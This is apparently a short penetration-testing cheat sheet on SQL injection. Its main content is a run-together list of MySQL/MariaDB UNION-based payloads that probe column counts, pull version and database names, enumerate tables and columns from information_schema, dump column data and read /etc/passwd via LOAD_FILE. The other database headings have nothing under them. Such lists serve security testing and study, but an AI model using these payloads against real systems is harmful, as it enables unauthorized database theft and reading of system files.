SQL Injection
Common Injections
MySQL & MariaDB
-1 order by 3;#-1 union select 1,2,version();#-1 union select 1,2,database();#-1 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema="<DATABASE>";#-1 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema="<DATABASE>" and table_name="<TABLE>";#SELECT LOAD_FILE('/etc/passwd')-1 union select 1,2, group_concat(<COLUMN>) from <DATABASE>.<TABLE>;#MSSQL
Orcale SQL
SQLite
UNION-based SQL Injection (SQLi)
Bind SQL
XPATH Injection

Explotation
Last updated